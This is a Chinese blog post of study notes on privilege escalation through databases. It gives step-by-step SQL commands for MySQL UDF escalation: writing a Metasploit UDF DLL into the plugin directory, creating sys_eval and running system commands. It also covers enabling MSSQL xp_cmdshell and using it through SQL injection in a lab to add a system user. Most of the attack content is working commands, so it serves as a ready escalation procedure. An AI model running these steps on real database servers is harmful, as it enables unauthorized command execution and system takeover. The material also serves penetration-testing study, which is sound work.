Mysql/Mssql应用程序提权(蚁景学习笔记)

已于 2024-07-13 23:27:25 修改
阅读量602 收藏 6
点赞数 21
文章标签: mysql sqlserver 数据库 学习 笔记
于 2024-07-13 22:05:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74326506/article/details/140364213
版权

一,Mysql提权

1.UDF

        UDF是用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,则可以自己用UDF加函数进去,加了之后就可以创建使用

2.UDF提权利用条件

        a.获取目标web shell

        b.获取到数据库账号密码且可以远程连接

        c.可以操作数据库

        d.可以写文件

(如果获取目标webshell 可以在本地进行爆破数据库账号密码,可以找数据库配置文件,可以进行hash破解数据库密码,所以如果拿到webshell,基本上就可以满足其他条件,因为有时虽然上传了shell,但是目标禁用了某些函数,导致蚁剑可以连到,但是打开终端却执行不了命令)

3.UDF提权步骤

(获取到目标数据库账号密码后,这里使用Navicat Premium进行远程连接)

        a.确认操作系统和架构

select @@version_compile_os, @@version_compile_machine;
或
show variables like '%compile%';

        有些时候,操作系统和mysql版本并不一样,要根据mysql版本来挑选.dll文件,这里发现是32位的,所以.dll文件选为32位

60276d59274345e58451b3030cae3692.png

        b.查看mysql安装路径和版本

show variables like '%char%';
select @@datadir;
select version();

     f3f95c0422fc4bf1bec659671039ec40.png   60b3518e15bf49a289e85275501ee141.png

        c.查看plugin路径

        mysql5.1以后,udf.ll存放在安装目录\lib\plugin中

select @@plugin_dir;

2d171d5c1dd84f6bad66ce05c8881dbe.png

        b.查看是否有写权限

show global variables like '%secure%';

02561be06c854926abcd26436f5c05c1.png

这里如果为空,则代表任意的导入导出,为null代表不允许导入导出,两者不一样

还要明白两条命令

select '111' into dumpfile 'C:\\1.txt';(将字符串111以二进制形式写入1.txt)

select '222' into outfile 'C:\\2.txt';(将字符串111以文本形式写入1.txt)

        e.创建plugin目录

mysql5.1以后,udf.ll存放在\lib\plugin目录中,但是有些mysql的安装目录下并没有,这时需要ntfs ads流创建目录

select 'xxx' into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

        f.将dll文件转为16进制

metasploit-framework/data/exploits/mysql at master · rapid7/metasploit-framework · GitHub

b187a0c2e1aa44118d91ce5408416dc5.png

        g.创建临时表

create table udftemp(data BLOB);

e3ee75485c5945f6b0f38a8988e18903.png

        h.将转换为16进制的ddl插入临时表

insert into udftemp(data) values (0x+udf.txt中的值);

       7aaf3142242241a6814fc33348de6fc5.png

        i.将dll导入pluginmulu

select data from udftemp into dumpfile "C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin";

08d4825f272b4f1da8b44ac411ac11c6.png

        g.创建函数

create function sys_eval returns string soname 'udf.dll';

这里创建的函数是ddl文件中提前编好的,函数功能也是,名字必须和文件中一样

ea14005d253e42fa9b58c526e593ecb3.png

        h.执行命令

select sys_eval('whoami');

4b5370da1b194dac92dfd792666c9824.png

二.mssql提权

1.xp_cmdshell

        在SQL Server 2000中默认是开启的,在SQL Server 2005及以上版本中xp_cmdshell 默认是关闭的,和mysql不一样,xp_cmdshell是mssql专门用来执行系统命令的,用法如下:

exec master..xp_cmdshell "dos命令";

        了解代码之后,就可以将此命令和sql注入一起利用起来,实现sql注入执行系统命令

a.确定目标是否可以执行该指令

select IS_SRVROLEMEMBER ('sysadmin')

        返回1则代表目标在sysadmin中,可以执行xp_cmdshell

b.判断是否有xp_cmdshell

select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'

        该命令是统计xp_cmdshell个数,返回1则判断存在xp_cmdshell

c.判断目标是否启用xp_cmdshell

直接执行命令,若报错,则是没开启

exec master..xp_cmdshell "whoami";
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
//开启

d.执行系统命令

exec master..xp_cmdshell "whoami";

  此外mssql的sp_oacreate也可以实现同样的效果

e.攻击靶场

尝试闭合,发现没有闭合

8ed36a8141024fc3b5234ef89a7a70fc.png

于是确定目标是否可以执行xp_cmdshell

3273470ef5a64dbd90303cec25820d9d.png

判断可以执行xp_cmdshell后,判断是否存在xp_cmdshell

9ce1ff916be34f5799b67e889424acab.png

确实存在xp_cmdshell,接下来判断是否启用xp_cmdshell

3b7f6f8f75604452857cf2ae2d0315db.png

执行命令后报错,未开启xp_cmdshell,则给他开启

5c88a28003654d7eb2caa91d48e5ac3e.png

启用之后,执行命令添加用户name

0baa6ae8f029402390ca37010e7c4661.png

5ce97faa8161410499be3cdb613b2a8f.png

 

拾荒家
关注
  • 21
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
学习笔记】-篇(保姆级)
rm -rf *
01-30 479
内网渗透(详细、初级)、手段归纳
mysql增删改查学习笔记
一只小鱼
04-20 415
1.insert语法: insert into 表名(列1,…… 列n) values(值 1,…… 值 n); insert into 表名 values(值 1,…… 值 n); 例如: insert into teacher values ("04","三八")(添加表名为teacher的所有值) insert into teacherr(tid,tame) va...
网安学习笔记 7 ---- mysql 初学
最新发布
ymy13326056686的博客
09-25 53
这款数据库是由微软发布的,是一款关联式数据序管理型系统的数据库,通常是被用来开发Web应用程序这些应用程序都利用Asp技术在IIs上运行,但是由于Access是小型的数据库,在很多的使用上都有着局限性,而且如果过多的数据库访问量还会造成数据库的性能极具下降。这款数据库的特点是真正的客户/服务器体系结构,并且是图形化的用户界面,使数据库管理方式更加直观和简单。数据库专业的来说,其实就是一种电子的仓库,是专门储存数据和管理数据的一种处所,用户可 以对数据库中的数据进行新增、更新或者删除等操作。
用Python写了个工具,完美破解了MySQL!!(建议收藏)
热门推荐
冰河的专栏
07-01 4万+
再也不怕忘记MySQL的用户名和密码了,用这个工具可以秒破MySQL,冰河强烈建议收藏!!
学习笔记
Fly_鹏程万里
06-07 1401
WEB1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行c:\windows\temp\cookies\net1.exeuser2.当成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp ,之后使用刚的用户登录进去就是system限,再试试一般就可以了。3.cmd拒绝访问的话就自...
mysql语句学习_mysql查询语句(mysql学习笔记七)
weixin_36264801的博客
01-28 73
Sql语句一般顺序GHOL :group by,having ,order by,limit如果是分组,应该使用对分组字段进行排序的group by语法Limit start ,length去除重复记录默认为allSelect distinct字段fromSelect distinct * from没用(所有字段组合不相同才认为不相同,用在这里基本没用),记录值完全一样时取其一个Union查询把两...
异步保存数据到mysqlmssql 学习笔记
DN_XIAOXIAO的博客
10-25 301
from twisted.enterprise import adbapi class NewtqPipeline: #def process_item(self, item, spider): #print(item['city'],item['day'],item['gw'],item['dw'],item['tq'])#以上两行为直接打印出啦 def __init__(self,mssql_config): self.adbpool = ad...
渗透测试学习笔记
hklearner的博客
02-19 936
web 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user 2.当成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚的用户登录进去就是system限,再试试一般就可以了。 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以
数据库 T-SQL流控制语句3 MSSQL 学习笔记4
小猪宝宝的博客
06-08 470
流程控制语句 Transact-SQL供称为控制流语言的特殊关键字,用于控制Transact-SQL语句、语句块和存储过程的执行流。 4.3.1流程控制语句 4.3.1.1 BEGIN…END语句 BEGIN…END语句用于将多个Transact-SQL语句组合为一个逻辑块。当流程控制语句必须执行一个包含两条或两条以上的T-SQL语句的语句块时,使用BEGIN…END语句。语法如下: BEGIN {sql_statement…} END 其中,sql_statement是指包含的Transact-SQL
SQL数据库学习笔记总结(数据库创建和基本概念)
12-14
在SQL数据库的学习中,了解和掌握基本概念是至关重要的。首先,我们来解析一下标题和描述中的关键知识点。 1. **逻辑数据库**:在SQL Server 2008中,逻辑数据库是由完全限定名来表示的,它由四个部分组成:服务器...
oracle学习文档 笔记 全面 深刻 详细 通俗易懂 doc word格式 清晰 连接字符串
05-06
oracle学习文档 笔记 全面 深刻 详细 通俗易懂 doc word格式 清晰 第一章 Oracle入门 一、 数据库概述 数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,它产生于距今五十年前。简单来说是本身可视...
chx 学习jForum笔记十八 jForum与ms sqlserver
03-22
《jForum与MS SQLServer整合学习笔记》 jForum是一款基于Java的开源论坛系统,它以其高度可定制性、灵活性和强大的功能深受开发者喜爱。在本文中,我们将深入探讨如何将jForum与Microsoft SQL Server(简称MS SQL...
mysql菜鸟进阶电子书
09-10
【标题】:“MySQL菜鸟进阶电子书”是一个专门为MySQL初学者设计的学习资源,旨在帮助他们逐步升技能,深入了解和熟练运用MySQL数据库系统。这本书以易懂的方式讲解了MySQL的基础概念和高级特性,使得读者能够从...
javaweb笔记超 详细
11-03
同时,针对不同的数据库系统如MSSQLMySQL、Oracle,需要熟悉它们的特定语法和特性。 3. **静态网页知识**:HTML用于构建网页结构,CSS用于样式设计,JavaScript(包括jQuery库)则用于增加交互性。理解HTML标签、...
houkc.github.io:HouKC的博客
05-08
Web安全学习笔记(最近更新)Web笔记(一)SQL注入之MySQLWeb笔记(二)SQL注入之AccessWeb笔记(三)SQL注入之MssqlWeb笔记(四)SQL注入之OracleWeb笔记(五)SQL注入之PostgreSQLWeb笔记(六)SQL注入之其他注入...
java项目之订销管理系统源码.zip
07-14
MySQL是另一种流行的开源数据库,常用于Web应用程序。 3. **文档资料**: - `java学习资源.docx`:这是一个文档文件,可能包含Java学习的相关教程、代码示例或者系统开发过程中的笔记,对于理解和研究项目源码非常...
asp.net知识库
06-18
VS2005 ASP.NET本地化学习笔记&感受 在自定义Server Control中捆绑JS文件 Step by Step 深度解析Asp.Net2.0中的Callback机制 使用 Web 标准生成 ASP.NET 2.0 Web 站点 ASP.NET 2.0基于SQLSERVER 2005的aspnetdb.mdf...
jive.chm
07-31
系统设计 1 jive设计思路 2 jive的工作内幕 3 Jive源代码研究 4 Jive中的设计模式 5 jive学习笔记 <br> 设计模式 1 大道至简-Java之23种模式一点就通 2 设计模式...
用docker部署mssq会节约多少硬盘空间
06-26
在 Docker 中部署 MSSQL 可以节约硬盘空间的原因是因为 Docker 使用了容器化技术。在传统的虚拟机中,每个虚拟机都需要独立的操作系统和应用程序,因此会占用大量的硬盘空间。而在 Docker 中,每个容器只需要包含应用程序和依赖库等必要的文件,不需要独立的操作系统,因此容器的大小相对较小。 具体地说,如果在传统的虚拟机中部署 MSSQL,通常需要安装操作系统、MSSQL Server 和其他必要的组件,这可能需要数十 GB 的硬盘空间。而在 Docker 中,可以使用 Microsoft 官方供的 MSSQL Server 镜像,这个镜像的大小只有几个 GB,因此可以大大节约硬盘空间。 另外,使用 Docker 还可以方便地进行容器的管理和部署,可以快速创建、启动、停止和删除容器,大大高了开发和运维的效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值